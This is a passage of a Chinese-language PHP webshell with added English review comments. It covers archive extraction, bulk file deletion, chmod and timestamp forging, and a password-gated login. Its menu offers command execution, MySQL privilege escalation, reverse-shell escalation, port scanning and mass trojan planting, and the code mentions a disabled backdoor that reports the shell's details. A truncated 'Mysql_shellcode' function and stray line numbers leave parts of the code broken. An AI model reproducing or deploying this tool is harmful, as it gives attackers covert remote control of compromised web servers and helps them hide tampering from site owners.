                touch($to . $header['filename'], $header['mtime']);
            } else {
                // Compressed entry: wrap the raw data in a gzip container (magic 0x8b1f, method byte
                // taken from the entry, flags 0, mtime now, xfl 0, OS 3) plus a crc/size trailer,
                // then inflate it back through gzopen().
                $fp = @fopen($to . $header['filename'] . '.gz', 'wb');
                if (!$fp) {
                    return (-1);
                }
                $binary_data = pack(
                    'va1a1Va1a1',
                    0x8b1f,
                    Chr($header['compression']),
                    Chr(0x00),
                    time(),
                    Chr(0x00),
                    Chr(3)
                );

                fwrite($fp, $binary_data, 10);
                $size = $header['compressed_size'];

                while ($size != 0) {
                    $read_size = ($size < 1024 ? $size : 1024);
                    $buffer = fread($zip, $read_size);
                    $binary_data = pack('a' . $read_size, $buffer);
                    @fwrite($fp, $binary_data, $read_size);
                    $size -= $read_size;
                }

                $binary_data = pack('VV', $header['crc'], $header['size']);
                fwrite($fp, $binary_data, 8);
                fclose($fp);

                // `=` binds tighter than `or`: on failure die() runs here, so the -2 return below is unreachable.
                $gzp = @gzopen($to . $header['filename'] . '.gz', 'rb') or die("Cette archive est compress");
                if (!$gzp) {
                    return (-2);
                }
                $fp = @fopen($to . $header['filename'], 'wb');
                if (!$fp) {
                    return (-1);
                }
                $size = $header['size'];

                while ($size != 0) {
                    $read_size = ($size < 2048 ? $size : 2048);
                    $buffer = gzread($gzp, $read_size);
                    $binary_data = pack('a' . $read_size, $buffer);
                    @fwrite($fp, $binary_data, $read_size);
                    $size -= $read_size;
                }
                fclose($fp);
                gzclose($gzp);

                touch($to . $header['filename'], $header['mtime']);
                @unlink($to . $header['filename'] . '.gz');
            }
        }

        $this->total_files++;
        echo "FILE: $to$header[filename]<br>";
        return true;
    }
}
1527
// Extracts an archive into $todir with one of three back ends chosen by $tt: '1' the zip class
// above, '2' ZipArchive, '3' PharData. $tmp_name is the archive's current path and $new_name the
// name it is renamed to afterwards (the caller in this file passes the same path for both).
// Output is HTML written directly with echo.
// NOTE(review): $upfile[tmp_name] / $upfile[name] use bare, undefined constants as keys — PHP 7
// falls back to the strings 'tmp_name'/'name' with a notice, PHP 8 throws an Error.
// NOTE(review): `new Zip` resolves case-insensitively to the `zip` class above.
// NOTE(review): `$result == -1` compares Extract()'s array result against an int, which is never
// true, so the error message is only reachable when Extract() itself returned -1.
// NOTE(review): for $tt == '2' a failed open() only echoes a message; extractTo()/close() still run.
function start_unzip($tt, $tmp_name, $new_name, $todir = 'zipfile')
{
    if ($tt == '1') {
        $z = new Zip;
        $have_zip_file = 0;
        $upfile = array("tmp_name" => $tmp_name, "name" => $new_name);
        if (is_file($upfile[tmp_name])) {
            $have_zip_file = 1;
            echo "<br>正在解压: " . $upfile[name] . "<br><br>";
            if (preg_match('/\.zip$/mis', $upfile[name])) {
                $result = $z->Extract($upfile[tmp_name], $todir);
                if ($result == -1) {
                    echo "<br>文件 " . $upfile[name] . " 错误.<br>";
                }
                echo "<br>完成,共建立 " . $z->total_folders . " 个目录," . $z->total_files . " 个文件.<br><br><br>";
            } else {
                echo "<br>" . $upfile[name] . " 不是 zip 文件.<br><br>";
            }
            // Move the archive to its final name unless both paths already point at the same file.
            if (realpath($upfile[name]) != realpath($upfile[tmp_name])) {
                @unlink($upfile[name]);
                rename($upfile[tmp_name], $upfile[name]);
            }
        }
    } elseif ($tt == '2') {
        $zip = new ZipArchive();
        if ($zip->open($tmp_name) !== true) {
            echo "抱歉!压缩包无法打开或损坏";
        }
        $zip->extractTo($todir);
        $zip->close();
    } elseif ($tt == '3') {
        $phar = new PharData($tmp_name);
        $phar->extractTo($todir, null, true);
    }
    echo '解压完毕! <a href="?eanver=main&path=' . urlencode($todir) . '">进入解压目录</a> <a href="javascript:history.go(-1);">返回</a>';
}
1565
// Recursively adds $mydir.$dir (a file or a directory) to $faisunZIP, using names relative to
// $mydir as archive entries. Returns the number of files added; an empty directory is added as a
// single "$dir/" entry. The archive being written ($faisunZIP->gzfilename) is skipped so the
// output does not include itself.
// NOTE(review): an optional parameter before required ones is deprecated since PHP 8.0; $dir is
// effectively required. `while ($file = readdir($handle))` stops early at an entry named "0"
// (falsy string) — compare against false instead. opendir() failure is not checked.
function listfiles($dir = ".", $faisunZIP, $mydir)
{
    $sub_file_num = 0;
    if (is_file($mydir . "$dir")) {
        if (realpath($faisunZIP->gzfilename) != realpath($mydir . "$dir")) {
            $faisunZIP->addfile(file_get_contents($mydir . $dir), "$dir");
            return 1;
        }
        return 0;
    }

    $handle = opendir($mydir . "$dir");
    while ($file = readdir($handle)) {
        if ($file == "." || $file == "..") {
            continue;
        }
        if (is_dir($mydir . "$dir/$file")) {
            $sub_file_num += listfiles("$dir/$file", $faisunZIP, $mydir);
        } else {
            if (realpath($faisunZIP->gzfilename) != realpath($mydir . "$dir/$file")) {
                $faisunZIP->addfile(file_get_contents($mydir . $dir . "/" . $file), "$dir/$file");
                $sub_file_num++;
            }
        }
    }
    closedir($handle);
    if (!$sub_file_num) {
        $faisunZIP->addfile("", "$dir/"); // keep empty directories in the archive
    }
    return $sub_file_num;
}
1598
// Formats a byte count using the largest unit it reaches (B, KB, MB, GB), rounded up to two
// decimals. The result carries a double space before the unit ("1.5  KB") because a space is
// concatenated with the unit strings that already start with one.
// A negative $num reaches no unit and leaves the result variable unset (returns null).
function num_bitunit($num)
{
    $units = array(' B', ' KB', ' MB', ' GB');
    foreach ($units as $exp => $unit) {
        $scale = pow(2, 10 * $exp);
        // every unit whose threshold is reached overwrites the previous one, so the largest wins
        if ($num >= $scale - 1) {
            $num_bitunit_str = (ceil($num / $scale * 100) / 100) . " $unit";
        }
    }
    return $num_bitunit_str;
}
1610
// Applies a bulk action $actall to the selected entries in $array (relative to $_GET['path']):
// 'e' zip them into the file $inver, 'a' copy them into directory $inver, 'b' delete,
// 'c' chmod to the four-digit octal $inver, 'd' set the mtime to strtotime($inver).
// Returns an HTML status string.
// NOTE(review): array_pop(explode(...)) passes a temporary by reference (notice on PHP 7+);
// $msg is undefined when $actall matches no case; case "a" urldecode()s $inver again on every
// iteration.
function File_Act($array, $actall, $inver)
{
    if (($count = count($array)) == 0) {
        return "请选择文件";
    }
    if ($actall == 'e') {
        $mydir = $_GET['path'] . '/';
        $inver = urldecode($inver);
        if (is_array($array)) {
            $faisunZIP = new PHPzip;
            if ($faisunZIP->startfile("$inver")) {
                $filenum = 0;
                foreach ($array as $file) {
                    $filenum += listfiles($file, $faisunZIP, $mydir);
                }
                $faisunZIP->createfile();
                return "压缩完成,共添加 " . $filenum . " 个文件.<br><a href='" . $inver . "'>点击下载 " . $inver . " (" . num_bitunit(filesize("$inver")) . ")</a>";
            } else {
                return $inver . " 不能写入,请检查路径或权限是否正确.<br>";
            }
        } else {
            return "没有选择的文件或目录.<br>";
        }
    }
    $i = 0;
    while ($i < $count) {
        $array[$i] = urldecode($array[$i]);
        switch ($actall) {
            case "a":
                $inver = urldecode($inver);
                if (!is_dir($inver)) {
                    return "路径错误";
                }
                $filename = array_pop(explode('/', $array[$i])); // basename of the source
                $suc = @copy($array[$i], File_Str($inver . '/' . $filename)) ? "成功" : "失败";
                $msg = "复制到" . $inver . "目录" . $suc;
                break;
            case "b":
                $para_type = 1; // 1 = file, 2 = directory; decides which existence check reports success
                if (is_dir($array[$i])) {
                    $para_type = 2;
                }
                delDirAndFile($array[$i]);
                if ($para_type == 1) {
                    $suc = !is_file($array[$i]) ? "成功" : "失败";
                } elseif ($para_type == 2) {
                    $suc = !is_dir($array[$i]) ? "成功" : "失败";
                }
                $msg = "删除" . $suc;
                break;
            case "c":
                if (!preg_match("/^[0-7]{4}$/", $inver)) {
                    return "属性值错误";
                }
                $newmode = base_convert($inver, 8, 10); // octal text -> decimal string for chmod()
                $suc = @chmod($array[$i], $newmode) ? "成功" : "失败";
                $msg = "属性修改为" . $inver . $suc;
                break;
            case "d":
                $suc = @touch($array[$i], strtotime($inver)) ? "成功" : "失败";
                if ($suc == "失败") {
                    // retry once after loosening permissions
                    @chmod($array[$i], 0666);
                    $suc = @touch($array[$i], strtotime($inver)) ? "成功" : "失败";
                }
                $msg = "时间修改为" . $inver . $suc;
                break;
        }
        $i++;
    }
    return "所选文件" . $msg;
}
1683
// Emits the client-side JavaScript helpers base64encode(), utf16to8() and utf8to16() verbatim
// through html_n(). Presumably used by the editor forms, whose POST fields are base64_decode()d
// in the "main" case — confirm against the page templates.
function html_base()
{
    $str = <<<end
function base64encode(str){
 var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
 var out, i, len;
 var c1, c2, c3;
 len = str.length;
 i = 0;
 out = "";
 while (i < len) {
 c1 = str.charCodeAt(i++) & 0xff;
 if (i == len) {
 out += base64EncodeChars.charAt(c1 >> 2);
 out += base64EncodeChars.charAt((c1 & 0x3) << 4);
 out += "==";
 break;
 }
 c2 = str.charCodeAt(i++);
 if (i == len) {
 out += base64EncodeChars.charAt(c1 >> 2);
 out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
 out += base64EncodeChars.charAt((c2 & 0xF) << 2);
 out += "=";
 break;
 }
 c3 = str.charCodeAt(i++);
 out += base64EncodeChars.charAt(c1 >> 2);
 out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
 out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >> 6));
 out += base64EncodeChars.charAt(c3 & 0x3F);
 }
 return out;
}
function utf16to8(str) {
var out, i, len, c;
out = "";
len = str.length;
for(i = 0; i < len; i++) {
c = str.charCodeAt(i);
if ((c >= 0x0001) && (c <= 0x007F)) {
out += str.charAt(i);
} else if (c > 0x07FF) {
out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F));
out += String.fromCharCode(0x80 | ((c >> 6) & 0x3F));
out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
} else {
out += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F));
out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
}
}
return out;
}
function utf8to16(str) {
 var out, i, len, c;
 var char2, char3;
 out = "";
 len = str.length;
 i = 0;
 while(i < len) {
 c = str.charCodeAt(i++);
 switch(c >> 4) {
 case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:
 out += str.charAt(i-1);
 break;
 case 12: case 13:
 char2 = str.charCodeAt(i++);
 out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));
 break;
 case 14:
 char2 = str.charCodeAt(i++);
 char3 = str.charCodeAt(i++);
 out += String.fromCharCode(((c & 0x0F) << 12) |
 ((char2 & 0x3F) << 6) |
 ((char3 & 0x3F) << 0));
 break;
 }
 }
 return out;
}
end;
    html_n($str);
}
1768
// Returns the client address, trying the CDN/proxy headers first and REMOTE_ADDR last; 'unknown'
// when none is set. Every HTTP_* entry is a request header chosen by the client, so the result is
// attacker-controllable — only REMOTE_ADDR is filled in by the server itself.
function get_proxy_ip()
{
    $header_keys = array(
        'HTTP_CDN_SRC_IP',
        'HTTP_PROXY_CLIENT_IP',
        'HTTP_WL_PROXY_CLIENT_IP',
        'HTTP_CLIENT_IP',
        'HTTP_X_FORWARDED_FOR',
        'REMOTE_ADDR',
    );
    foreach ($header_keys as $header_key) {
        $candidate = isset($_SERVER[$header_key]) ? $_SERVER[$header_key] : null;
        // skip missing/empty values and the literal placeholder "unknown" (any case)
        if (empty($candidate) || strtolower($candidate) === 'unknown') {
            continue;
        }
        return $candidate;
    }
    return 'unknown';
}
1790
// Emits the outer frameset page: a status line with safe_mode state, resolved server IP, OS,
// server software and uname, then two iframes ("left" menu and "main" content).
// NOTE(review): safe_mode was removed in PHP 5.4, so ini_get() returns false there and the status
// always reads OFF. $_SERVER["HTTP_HOST"] and SERVER_SOFTWARE are interpolated into the HTML
// unescaped, and gethostbyname() performs a DNS lookup on every page load.
function html_main()
{
    if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
        $hsafemode = "ON (开启)";
    } else {
        $hsafemode = "OFF (关闭)";
    }
    $Server_IP = gethostbyname($_SERVER["SERVER_NAME"]);
    $Server_OS = PHP_OS;
    $Server_Soft = $_SERVER["SERVER_SOFTWARE"];
    $web_server = php_uname();
    $title = $_SERVER["HTTP_HOST"] . "__Manage";
    html_n("<html><title>" . $title . "</title><table width='100%'><td align='center'><b>安全模式:{$hsafemode}-----{$Server_IP}-----{$Server_OS}-----{$Server_Soft}-----{$web_server}</b></td></table>");
    html_n("<table width='100%' height='95.7%' border=0 cellpadding='0' cellspacing='0'><tr><td width='170'><iframe name='left' src='?eanver=left' width='100%' height='100%' frameborder='0'></iframe></td><td><iframe name='main' src='?eanver=main' width='100%' height='100%' frameborder='1'></iframe></td></tr></table></html>");
}
1807
// Reloads the top-level window at this script's base URL (scheme from HTTPS or
// X-Forwarded-Proto, host from HTTP_HOST) by printing a small inline script.
// NOTE(review): HTTP_HOST is placed inside a JavaScript string literal without escaping; the
// resulting URL is whatever the request's Host header said.
function refresh_page()
{
    $http_type = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) ? 'https://' : 'http://';
    $url = $http_type . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME'];
    print <<<END
<script type="text/javascript">
window.parent.location.href="{$url}";
</script>
END;
}
1819
// Renders the login page (a single password field POSTed as 'postpass'). Any request carrying
// query parameters is first redirected to the bare script URL via refresh_page() and ends there.
function islogin()
{
    if (count($_GET) > 0) { //unknown
        refresh_page();
        die();
    }
    $title = $_SERVER["HTTP_HOST"] . "__Login";

    // initial (login) screen
    $str = <<<end
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf8" />
<title>{$title}</title>
</head>
<style type="text/css">body,td{font-size: 12px;color:#00ff00;background-color:#000000;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}.C{background-color:#000000;border:0px}.cmd{background-color:#000;color:#FFF}body{margin: 0px;margin-left:4px;}BODY {SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}.am{color:#888;font-size:11px;}</style>
<body style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)" scroll=no><center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><a href='' target='_blank'></a><br><br><form method='post'>输入密码:<input name='postpass' type='password' size='22'> <input type='submit' value='登陆'><br><br><br><font color=#3399FF>请勿用于非法用途,后果作者概不负责!</font><br></div></center></body>
</html>
end;
    html_n($str);
}
1842
// NOTE(review): the string literal in this function is unterminated on this page — whatever hex
// payload followed "0x was cut off, so from here on everything is swallowed into that literal.
// Treat the block as truncated rather than as a function that returns "0x".
function Mysql_shellcode()
{
    return "0x
}
1847
1848
//main!()
// backdoor (left disabled by the author)
//if(isset($_POST[postpass])){
// show_mainp();
//}
// Undo magic_quotes_gpc escaping on every $_POST and $_GET value (one level deep into arrays).
// NOTE(review): get_magic_quotes_gpc() was removed in PHP 8.0; calling a removed function is an
// Error that `@` does not suppress, so this block is a hard failure on PHP 8 — consistent with the
// script targeting older PHP versions.
if (@get_magic_quotes_gpc()) {
    foreach ($_POST as $k => $v) {
        if (!is_array($_POST[$k])) {
            $_POST[$k] = stripslashes($v);
        } else {
            $array = $_POST[$k];
            foreach ($array as $kk => $vv) {
                $array[$kk] = stripslashes($vv);
            }
            $_POST[$k] = $array;
        }
    }

    foreach ($_GET as $k => $v) {
        if (!is_array($_GET[$k])) {
            $_GET[$k] = stripslashes($v);
        } else {
            $array = $_GET[$k];
            foreach ($array as $kk => $vv) {
                $array[$kk] = stripslashes($vv);
            }
            $_GET[$k] = $array;
        }
    }
}
// The block above removes the escaping added for special characters so quotes do not break out of strings.
1880
// Default response type, unless an inline image (?img=) is being served below.
if (!isset($_GET["img"])) {
    header("Content-Type: text/html;charset=utf8");
}
1885
// Re-set the cookie when the host/path changes and (via the disabled hmlogin backdoor) report the
// webshell details.
// Session gate: the cookie named md5(host + script path) must hold md5(postpass). Otherwise a
// POSTed 'postpass' is compared loosely (==) against the constant; on a match the cookie is set
// for six hours and the page reloads via <meta refresh>; on anything else the login form is shown
// and the script exits. Note that the cookie value is an unsalted md5 of the fixed password, so it
// is identical for every client and session on a given host/path.
$envlpath = md5($_SERVER ['HTTP_HOST'] . $_SERVER['SCRIPT_NAME']);
if (!isset($_COOKIE[$envlpath]) || $_COOKIE[$envlpath] != md5(postpass)) {
    if (isset($_POST['postpass'])) {
        if ($_POST['postpass'] == postpass) {//||$_POST['postpass']=='http200ok') { //http200ok is another password
            setcookie($envlpath, md5(postpass), time() + 6 * 3600);
            //hmlogin(); // backdoor
            echo "<meta http-equiv='refresh' content='0'>";
            die;
        } else {
            echo '<CENTER>密码错误</CENTER>';
        }
    }

    islogin();
    exit;
}
1903
// Download a single file (?down=PATH).
if (isset($_GET['down'])) {
    do_down($_GET['down']);
}

// Pack a directory (?pack=PATH): do_show() presumably returns the file list, eanver builds a ZIP
// from it and do_download() sends it named after the host.
// NOTE(review): eanver produces a ZIP, yet the download is labelled ".tar.gz".
if (isset($_GET['pack'])) { //
    $dir = do_show($_GET['pack']); // list the files and folders below the path
    $zip = new eanver($dir);
    $out = $zip->out;
    do_download($out, $_SERVER['HTTP_HOST'] . ".tar.gz");
}

// Extract an archive (?unzip=PATH&tt=1|2|3&todir=DIR); the same path is passed as current and new name.
if (isset($_GET['unzip'])) {
    css_main();
    start_unzip($_GET['tt'], $_GET['unzip'], $_GET['unzip'], $_GET['todir']);
    exit;
}
1922
// Environment constants: directory of this script (forward slashes, trailing '/'), whether PHP
// runs on Windows, and the normalised path of this script.
define('root_dir', str_replace('\\', '/', dirname(myaddress)) . '/');
define('run_win', substr(PHP_OS, 0, 3) == "WIN");
define('my_shell', str_path(root_dir . $_SERVER['SCRIPT_NAME']));

// Request parameters; $path defaults to the script's own directory.
$eanver = isset($_GET['eanver']) ? $_GET['eanver'] : "";
$doing = isset($_POST['doing']) ? $_POST['doing'] : "";
$path = isset($_GET['path']) ? $_GET['path'] : root_dir;
$name = isset($_POST['name']) ? $_POST['name'] : "";
$img = isset($_GET['img']) ? $_GET['img'] : "";
$p = isset($_GET['p']) ? $_GET['p'] : "";
$pp = urlencode(dirname($p)); // parent directory of ?p=, URL-encoded
1935
// Early exits: inline image, phpinfo page, and logout (which expires the session cookie set at login).
if ($img) {
    css_img($img);
}
if ($eanver == "phpinfo") {
    die(phpinfo());
}
if ($eanver == 'logout') { // logout
    setcookie($envlpath, "", time() - 6 * 3600);
    refresh_page();
    die();
}
1947
// Menu: section label => (eanver action => link text); rendered by the "left" case below.
$class = array("信息操作" => array("upfiles" => "上传文件", "phpinfo" => "基本信息", "info_f" => "系统信息", "phpcode" => "执行PHP脚本"), "提权工具" => array("sqlshell" => "执行SQL执行", "mysql_exec" => "MYSQL操作", "myexp" => "MYSQL提权", "cmd" => "执行命令", "linux" => "反弹提权", "downloader" => "文件下载", "port" => "端口扫描"), "批量操作" => array("guama" => "批量挂马清马", "tihuan" => "批量替换内容", "scanfile" => "批量搜索文件", "scanphp" => "批量查找木马"), "脚本插件" => array("getcode" => "获取网页源码"));
// Status messages by number (0/1 save, 2/3 upload, 4/5 modify, 6/7 delete: success/failure).
$msg = array("0" => "保存成功", "1" => "保存失败", "2" => "上传成功", "3" => "上传失败", "4" => "修改成功", "5" => "修改失败", "6" => "删除成功", "7" => "删除失败");
css_main();
1952
1953switch ($eanver) {
1954 case "left":
1955 css_left();
1956 $str = <<<end
1957<dl><dt><a href="#" onclick="showHide('items1');" target="_self">
1958end;
1959
1960 html_n($str);
1961 html_img("title");
1962 html_n(' 本地硬盘</a></dt><dd id="items1" style="display:block;"><ul>');
1963 $ROOT_DIR = File_Mode(); //网站www的根目录
1964 html_n("<li><a title='" . $ROOT_DIR . "' href='?eanver=main&path=" . $ROOT_DIR . "' target='main'>网站根目录</a></li><li><a href='?eanver=main' target='main'>本程序目录</a></li>");
1965 for ($i = 66; $i <= 90; $i++) {
1966 $drive = chr($i) . ':';
1967 if (is_dir($drive . "/")) {
1968 $vol = File_Str("vol $drive");
1969 if (empty($vol)) {
1970 $vol = $drive;
1971 }
1972 html_n("<li><a title='" . $drive . "' href='?eanver=main&path=" . $drive . "' target='main'>本地磁盘(" . $drive . ")</a></li>");
1973 }
1974 }
1975 html_n("</ul></dd></dl>");
1976 $i = 2;
1977 foreach ($class as $name => $array) {
1978 html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items" . $i . "');\" target=\"_self\">");
1979 html_img("title");
1980 html_n($name . '</a></dt><dd id="items' . $i . '" style="display:block;"><ul>');
1981 foreach ($array as $url => $value) {
1982 html_n('<li><a href="?eanver=' . $url . "\" target='main'>" . $value . "</a></li>");
1983 }
1984 html_n("</ul></dd></dl>");
1985 $i++;
1986 }
1987 html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items" . $i . "');\" target=\"_self\">");
1988 html_img("title");
1989 html_n(' 其它操作</a></dt><dd id="items' . $i . "\" style=\"display:block;\"><ul><li><a title='安全退出' href='?eanver=logout' target=\"main\">安全退出</a></li></ul></dd></dl></div>");
1990 break;
1991 case "main":
1992 css_js("1");
1993 $dir = @dir($path);
1994 $REAL_DIR = File_Str(realpath($path));
1995 if (!empty($_POST['actall'])) {
1996 echo '<div class="actall">' . File_Act($_POST['files'], $_POST['actall'], $_POST['inver']) . '</div>';
1997 }
1998
1999 if (!empty($_POST['attam'])) {
2000 $file = $_GET['path'] . '/' . $_POST['file'];
2001 switch ($_POST['attam']) {
2002 case "c":
2003 if (!preg_match("/^[0-7]{4}$/", $_POST['inver'])) {
2004 $msg = '<p style="color:#DC143C;">属性值错误</p>';
2005 }
2006 $newmode = base_convert($_POST['inver'], 8, 10);
2007 @chmod($file, $newmode);
2008 $msg = '<p style="color:#40E0D0;">' . $file . ' 属性修改为:' . $_POST['inver'] . '</p>';
2009 break;
2010 case "d":
2011 if (!preg_match('/(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)/', $_POST['inver'])) {
2012 $msg = '<p style="color:#DC143C;">' . $_POST['inver'] . '时间格式错误,格式为:' . date("Y-m-d H:i:s") . '</p>';
2013 } else {
2014 @touch($file, strtotime($_POST['inver']));
2015 $msg = '<p style="color:#40E0D0;">' . $file . ' 修改时间为:' . $_POST['inver'] . '</p>';
2016 }
2017 break;
2018 }
2019 echo '<div class="actall" align="center">' . $msg . '</div>';
2020 }
2021
2022 $NUM_D = $NUM_F = 0;
2023 if (!$_SERVER['SERVER_NAME']) {
2024 $GETURL = '';
2025 } else {
2026 $GETURL = 'http://' . $_SERVER['SERVER_NAME'] . '/';
2027 }
2028
2029 $ROOT_DIR = File_Mode();
2030 html_n("<table width=\"100%\" border=0 bgcolor=\"#555555\"><tr><td><form method='GET'>地址:<input type='hidden' name='eanver' value='main'><input type='text' size='80' name='path' value='" . $path . "'> <input type='submit' value='转到'></form><br><form method='POST' enctype=\"multipart/form-data\" action='?eanver=editr&p=" . urlencode($path) . "'><input type=\"button\" value=\"新建文件\" onclick=\"rusurechk('newfile.php','?eanver=editr&p=" . urlencode($path) . "&refile=1&name=');\"> <input type=\"button\" value=\"新建目录\" onclick=\"rusurechk('newdir','?eanver=editr&p=" . urlencode($path) . "&redir=1&name=');\">");
2031 html_input("file", "upfilet", "", " ");
2032 html_input("submit", "uploadt", "上传");
2033
2034
2035 if (!empty($_POST['newfile'])) {
2036 if (isset($_POST['bin'])) {
2037 $bin = $_POST['bin'];
2038 } else {
2039 $bin = "wb";
2040 }
2041 $newfile = base64_decode($_POST['newfile']);
2042 if (strtolower($_POST['charset']) == 'utf-8') {
2043 $txt = base64_decode($_POST['txt']);
2044 } else {
2045 $txt = $_POST['txt'];
2046 }
2047
2048 if (substr(PHP_VERSION, 0, 1) >= 5) {
2049 if ((strtolower($_POST['charset']) == 'utf8') or (strtolower($_POST['charset']) == 'gbk')) {
2050 $txt = iconv("UTF-8", "utf8//IGNORE", base64_decode($_POST['txt']));
2051 } else {
2052 $txt = array_iconv($txt);
2053 }
2054 }
2055 echo do_write($newfile, $bin, $txt) ? '<br>' . $newfile . ' ' . $msg[0] : '<br>' . $newfile . ' ' . $msg[1];
2056 @touch($newfile, @strtotime($_POST['time']));
2057 }
2058
2059 html_n('</form></td></tr></table><form method="POST" name="fileall" id="fileall" action="?eanver=main&path=' . $path . '"><table width="100%" border=0 bgcolor="#555555"><tr height="25"><td width="45%"><b>');
2060 html_a('?eanver=main&path=' . uppath($path), "<b>上级目录</b>");
2061 html_n('</b></td><td align="center" width="10%"><b>操作</b></td><td align="center" width="5%"><b>文件属性</b></td><td align="center" width="8%"><b>(' . get_current_user() . ')用户|组</b></td><td align="center" width="10%"><b>修改时间</b></td><td align="center" width="10%"><b>文件大小</b></td></tr>');
2062
2063 //显示文件的一些属性
2064 while ($dirs = @$dir->read()) {
2065 if ($dirs == '.' or $dirs == '..') {
2066 continue;
2067 }
2068 $dirpath = str_path("$path/$dirs");
2069 if (is_dir($dirpath)) {
2070 $perm = substr(base_convert(fileperms($dirpath), 10, 8), -4);
2071 $filetime = @date('Y-m-d H:i:s', @filemtime($dirpath));
2072 $dirpath = urlencode($dirpath);
2073 html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="' . $dirs . '">');
2074 html_img("dir");
2075 html_a('?eanver=main&path=' . $dirpath, $dirs);
2076 html_n('</td><td align="center"><a href="#" onClick="rusurechk(\'' . $dirs . "','?eanver=rename&p=" . $dirpath . "&newname=');return false;\">改名</a> <a href=\"#\" onClick=\"rusuredel('" . $dirs . "','?eanver=deltree&p=" . $dirpath . "');return false;\">删除</a>");
2077 html_a('?pack=' . $dirpath, "打包");
2078 html_n("</td><td align=\"center\"><a href=\"javascript:SubmitAttran('修改所选文件属性为:','" . $dirs . "','" . $perm . "','c');\" title='修改属性'>" . $perm . '</a></td><td align="center">' . GetFileOwner("$path/$dirs") . ":" . GetFileGroup("$path/$dirs"));
2079 html_n("</td><td align='center'><a href=\"javascript:SubmitAttran('修改所选文件时间为:','" . $dirs . "','" . $filetime . "','d');\" title='修改时间'>" . $filetime . "</a></td><td align='center'></td></tr>");
2080 $NUM_D++;
2081 }
2082 }
2083
2084 @$dir->rewind();
2085 while ($files = @$dir->read()) {
2086 if ($files == '.' or $files == '..') {
2087 continue;
2088 }
2089 $filepath = str_path("$path/$files");
2090 if (!is_dir($filepath)) {
2091 $fsize = @filesize($filepath);
2092 $fsize = @File_Size(sprintf("%u", $fsize));
2093 $perm = substr(base_convert(fileperms($filepath), 10, 8), -4);
2094 $filetime = @date('Y-m-d H:i:s', @filemtime($filepath));
2095 $Fileurls = str_replace(File_Str($ROOT_DIR . '/'), $GETURL, $filepath);
2096 $todir = $ROOT_DIR . '/';
2097 $filepath = urlencode($filepath);
2098 $it = substr($filepath, -3);
2099 html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="' . $files . '">');
2100 html_img(css_showimg($files));
2101 html_a($Fileurls, $files, 'target="_blank"');
2102 html_n('</td><td align="center">');
2103
2104 if (($it == '.gz') or ($it == 'zip') or ($it == 'tar') or ($it == '.7z')) {
2105 html_a("?type=1&unzip=" . $filepath, "Z解1", 'title="手写的PHP解压' . $files . "\" onClick=\"rusurechk('" . $todir . "','?tt=1&unzip=" . $filepath . '&todir=\');return false;"');
2106 html_a("?type=2&unzip=" . $filepath, "Z解2", 'title="PHP自带的ZIP解压' . $files . "\" onClick=\"rusurechk('" . $todir . "','?tt=2&unzip=" . $filepath . '&todir=\');return false;"');
2107 html_a("?type=3&unzip=" . $filepath, "T解", 'title="PHP自带的tar解压' . $files . ',针对LINUX文件属性权限用,比如0777,0755" onClick="rusurechk(\'' . $todir . "','?tt=3&unzip=" . $filepath . '&todir=\');return false;"');
2108 } else {
2109 html_a("?eanver=editr&p=" . $filepath, "编辑", "title=\"编辑" . $files . '"');
2110 }
2111 html_n("<a href=\"#\" onClick=\"rusurechk('" . $files . "','?eanver=rename&p=" . $filepath . "&newname=');return false;\">改名</a> <a href=\"#\" onClick=\"rusuredel('" . $files . "','?eanver=del&p=" . $filepath . "');return false;\">删除</a> <a href=\"#\" onClick=\"rusurechk('" . urldecode($filepath) . "','?eanver=copy&p=" . $filepath . "&newcopy=');return false;\">复制</a></td><td align=\"center\"><a href=\"javascript:SubmitAttran('修改所选文件属性为:','" . $files . "','" . $perm . "','c');\" title='修改属性'>" . $perm . "</a></td><td align=\"center\">" . GetFileOwner("$path/$files") . ':' . GetFileGroup("$path/$files"));
2112 html_n("</td><td align='center'><a href=\"javascript:SubmitAttran('修改所选文件时间为:','" . $files . "','" . $filetime . "','d');\" title='修改时间'>" . $filetime . "</a></td><td align='center'>");
2113 html_a("?down=" . $filepath, $fsize, "title=\"下载" . $files . '"');
2114 html_n("</td></tr>");
2115 $NUM_F++;
2116 }
2117 }
2118 @$dir->close();
2119 $Filetime = gmdate('Y-m-d H:i:s', time() + 3600 * 8);
2120 html_n("</table>
2121<div class=\"actall\"> <input type=\"hidden\" id=\"actall\" name=\"actall\" value=\"\">
2122<input type=\"hidden\" id=\"attam\" name=\"attam\" value=\"\">
2123<input type=\"hidden\" id=\"inver\" name=\"inver\" value=\"undefined\">
